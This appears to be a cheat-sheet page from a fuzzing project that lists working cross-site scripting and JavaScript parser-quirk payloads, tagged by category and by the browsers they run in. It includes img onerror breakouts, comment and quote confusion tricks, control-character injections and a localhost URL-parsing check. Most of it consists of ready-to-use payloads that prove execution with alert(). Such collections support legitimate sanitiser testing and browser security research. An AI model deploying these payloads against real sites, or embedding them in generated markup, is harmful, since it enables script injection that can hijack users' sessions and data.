Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 169 vectors with results
prompt?.();alert(63)JSXSS ExecutionChromeMicrosoft Edge
eval('0x09alert(9)0x09')JSJavaScript SyntaxFirefoxChrome
eval('0x0Balert(11)0x0B')JSJavaScript SyntaxFirefoxChrome
eval('0x0Calert(12)0x0C')JSJavaScript SyntaxFirefoxChrome
eval(' alert(32) ')JSJavaScript SyntaxFirefoxChrome
eval(';alert(59);')JSJavaScript SyntaxFirefoxChrome
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->Author: hackvertor
XSSHTML ParsingChromeFirefoxSafari
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->Author: hackvertor
XSSHTML ParsingChromeFirefoxSafari
<div 0x09="><img src=x:x onerror=alert(9)>"></div>Author: hackvertor
XSSDOM BehaviorChromeFirefoxSafari
<div 0x0C="><img src=x:x onerror=alert(12)>"></div>Author: hackvertor
XSSDOM BehaviorChromeFirefoxSafari
<div 0x0D="><img src=x:x onerror=alert(13)>"></div>Author: hackvertor
XSSDOM BehaviorChromeFirefoxSafari
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->Author: freddyb
XSSHTML ParsingFirefoxSafariChrome
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->Author: freddyb
XSSHTML ParsingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(91) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(91)}Author: d0ge
JSURL HandlingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(65095) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65095)}Author: d0ge
JSURL HandlingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(65339) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65339)}Author: d0ge
JSURL HandlingFirefoxSafariChrome
"0x091337"==1337&&alert(9)JSCharacter EncodingChromeFirefoxSafari
"0x0B1337"==1337&&alert(11)JSCharacter EncodingChromeFirefoxSafari
"0x0C1337"==1337&&alert(12)JSCharacter EncodingChromeFirefoxSafari
" 1337"==1337&&alert(32)JSCharacter EncodingChromeFirefoxSafari
"+1337"==1337&&alert(43)JSCharacter EncodingChromeFirefoxSafari
({"x\0x0D0x0D
":1337}.x)==1337&&alert(13)JSXSS ExecutionChromeFirefoxSafari
<form id="test" action="aaa0x00onsubmit=alert(1)><input/type='submit'>0x0D
Author: p3n7a90n
XSSDOM BehaviorChrome
<div id="test" style="⟦00⟧onload="alert(1)">hello</div>XSSCSS ParsingChrome
<img src="/image.png" tag="0x00><iframe><!--">Source: HTML-Encoded Attribute Escape
Author: IDKdir
XSSDOM BehaviorChrome
<div id="test" style='0x00onload="alert(1)">hello</div>XSSCSS ParsingChromeFirefox
var targets=['"','\'','<','/','>','\\']0x0D
if (targets.includes('0x00'.toUpperCase())) {0x0D
alert(0+' (normal) (0x00 -> '+"0x00".toUpperCase()+')')0x0D
}0x0D
0x0D
if (targets.includes('0x00'.toLocaleUpperCase())) {0x0D
alert(0+' (locale) (0x00 -> '+"0x00".toLocaleUpperCase()+')')0x0D
}Author: IDKdir
JSJavaScript SyntaxChromeFirefox